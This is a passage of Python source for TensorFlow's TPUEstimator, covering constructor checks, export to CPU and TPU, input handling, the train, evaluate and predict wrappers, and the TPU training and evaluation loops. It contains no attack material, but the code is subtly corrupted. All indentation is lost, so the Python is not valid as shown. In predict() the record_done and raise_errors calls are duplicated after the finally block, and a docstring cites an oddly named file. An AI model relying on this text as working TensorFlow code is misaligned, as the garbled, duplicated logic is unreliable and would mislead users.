use_tpu: A bool indicating whether TPU support is enabled. Currently, TPU
training and evaluation respect this bit, but `eval_on_tpu` can override
execution of eval. See below.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_saved_model()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported.
Currently, export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_saved_model()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
embedding_config_spec: Optional EmbeddingConfigSpec instance
to support using TPU embedding.
export_saved_model_api_version: ExportSavedModelApiVersion, V1 or V2.
With V1, `export_saved_model()` adds rewrite() and TPUPartitionedCallOp()
for the user; with V2, the user is expected to add rewrite(),
TPUPartitionedCallOp(), etc. in their model_fn.
A helper function `inference_on_tpu` is provided for V2.
brn_tpu_estimator.py includes examples for both versions,
i.e. TPUEstimatorExportTest and TPUEstimatorExportV2Test.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
if embedding_config_spec:
if (config.tpu_config.per_host_input_for_training not in
(tpu_config.InputPipelineConfig.PER_HOST_V1,
tpu_config.InputPipelineConfig.PER_HOST_V2)):
raise ValueError('Only PER_HOST_V1 and PER_HOST_V2 are supported when '
'using TPU Embedding; got {}.'.format(
config.tpu_config.per_host_input_for_training))
self._embedding_from_feature_columns = (
embedding_config_spec.feature_columns is not None)
if (not (use_tpu and eval_on_tpu) and embedding_config_spec and
embedding_config_spec.partition_strategy == 'mod'):
raise ValueError('Mod sharding of embedding tables not supported on '
'CPU.')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = util_lib.parse_iterations_per_loop(
self._config.tpu_config.iterations_per_loop)
# In absence of an explicit `log_every_n_secs` config, if the
# `iterations_per_loop` value is specified as time in seconds, enable
# logging every n secs based on the `iterations_per_loop` value. A trade-off
# avoiding API change on the current release.
# TODO(henrytan): add `log_every_n_secs` to RunConfig.
if self._iterations_per_training_loop.unit == 'seconds':
self._log_every_n_secs = self._iterations_per_training_loop.value
self._log_every_n_steps = None
elif self._iterations_per_training_loop.unit == 'count':
if self._log_every_n_steps is not None:
# Each session.run() lasts for iterations_per_loop. We can't log
# in-between a session.run(), and we can only log after the
# `iterations_per_loop` steps, so we can only approximate. If a user
# requests to log every N steps, we actually want to roughly log every
# N / `iterations_per_loop` steps to match the original intention.
self._log_every_n_steps = (
int(math.ceil(float(self._log_every_n_steps) /
self._iterations_per_training_loop.value)))
self._log_every_n_secs = None
else:
assert False, ('Invalid TPUConfig `iterations_per_loop` value. '
'Indicates a bug in `iterations_per_loop` '
'parsing.')
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size, eval_batch_size, predict_batch_size,
use_tpu, eval_on_tpu, embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
if not isinstance(export_saved_model_api_version,
ExportSavedModelApiVersion):
raise ValueError('export_saved_model_api_version should be of type '
'ExportSavedModelApiVersion; got {}.'.format(
export_saved_model_api_version))
self._export_saved_model_api_version = export_saved_model_api_version
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
strip_default_attrs=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
logging.warning('TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
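# Re-key the PREDICT receiver under the special TPU inference mode and tag
# this metagraph with both SERVING and TPU so that serving can select it.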
input_receiver_fn_map = {
_INFERENCE_ON_TPU_MODE: input_receiver_fn_map[mode]
}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _INFERENCE_ON_TPU_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if mode == _INFERENCE_ON_TPU_MODE:
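# Build the serving graph inside a TPU inference context. The V1 export
# path wraps the model_fn in tpu.rewrite() for the user; the V2 path calls
# the user's model_fn directly (the user adds rewrite/TPUPartitionedCallOp).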
context = tpu._TPUInferenceContext('tpu_inference', check_ops=False)
try:
context.Enter()
if self._export_saved_model_api_version == ExportSavedModelApiVersion.V1:
result = self._call_model_fn_for_inference(features, labels, mode,
config)
else:
result = super(TPUEstimator, self)._call_model_fn(
features, labels, mode, config)
finally:
context.Exit()
return result
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_saved_model`."""
if mode != _INFERENCE_ON_TPU_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_INFERENCE_ON_TPU_MODE, mode))
return model_fn_inference_on_tpu(
self._model_fn,
features,
labels,
config,
self._params,
batch_config=None)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(
self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either features or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
if (ctx.is_running_on_cpu() and
ctx.is_input_slice_broadcast_to_all_cores()):
raise ValueError('Invalid TPUConfig `eval_training_input_configuration`'
' value. SLICED mode only works on use_tpu = True.')
# Setting the batch size in params first. This helps user to have same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_saved_model, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_saved_model()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _INFERENCE_ON_TPU_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps
else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
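# For training with TPU embedding, create dummy table variables and their
# initializer; the dummies are stashed on the embedding config and the
# initializer is appended to the TPU init ops below.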
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters
)
)
else:
embedding_variable_name_by_table = None
slot_variable_names_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after the variables for TPU embedding have
# been created on CPU, as the user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
if finalizer_hooks:
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops,
outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps),
InstallSignalHandlerHook()
])
if _check_add_preemption_hook(self._config.cluster):
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
if self._iterations_per_training_loop.unit == 'count':
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
hooks.append(training.LoggingTensorHook(
{
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs))
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
if self._iterations_per_training_loop.unit == 'count':
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
else:
# When estimating iterations_per_loop, set steps_per_run to an
# arbitrarily high number to force checking the global step on
# every call.
# TODO(henrytan): refactor SecondOrStepTimer to do this more
# explicitly.
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
100000)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict)
)
else:
embedding_variable_name_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after the variables for TPU embedding have
# been created on CPU, as the user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
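# `_eval_on_tpu_system` accumulates the loss over `iterations_per_loop`
# steps on the device, so divide by the step count to report the mean.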
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with ops.control_dependencies([mean_loss]):
# After the TPU evaluation computation is done (the mean_loss tensor),
# read all variables back from the TPU and update the eval step counter
# properly.
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects all metrics in `eval_metric_ops` have update_op and calls
# them one by one. The real metric update_ops are invoked in a
# separate thread. So, here we give Estimator the dummy op for all
# metrics.
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with ops.control_dependencies(internal_ops_to_run):
mean_loss = array_ops.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if _check_add_preemption_hook(self._config.cluster):
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls,
scaffold_fn, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
scaffold = _get_scaffold(scaffold_fn)
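# Chain the variable-sync ops after the TPU program, then replace
# dummy_predict_op with a no_op depending on them so that variables are
# copied back from the TPU once prediction finishes.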
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yields the element (via a generator) to the call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoids the issue that we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = []  # Empty, we do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _check_add_preemption_hook(cluster):
return (tpu_cluster_resolver.is_running_in_gce() and cluster and
isinstance(cluster, tpu_cluster_resolver.TPUClusterResolver) and
cluster._cloud_tpu_client.api_available())
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
'`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_eval_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As such, reshape the input back to a scalar.
replica_id = array_ops.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append(
[constant_op.constant(i) for i in range(ctx.num_replicas)])
(
compile_op,
loss,
) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_calls, captured_scaffold_fn,
captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
@tpu_function.on_device_training_loop
def multi_tpu_train_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As such, reshape the input back to a scalar.
replica_id = array_ops.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
outputs = training_loop.while_loop(
lambda i, loss: i < iterations_per_loop_var,
lambda i, loss: [i + 1, single_tpu_train_step(i)],
inputs=[0, _INITIAL_LOSS])
return outputs[1:]
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append(
[constant_op.constant(i) for i in range(ctx.num_replicas)])
(compile_op, loss) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
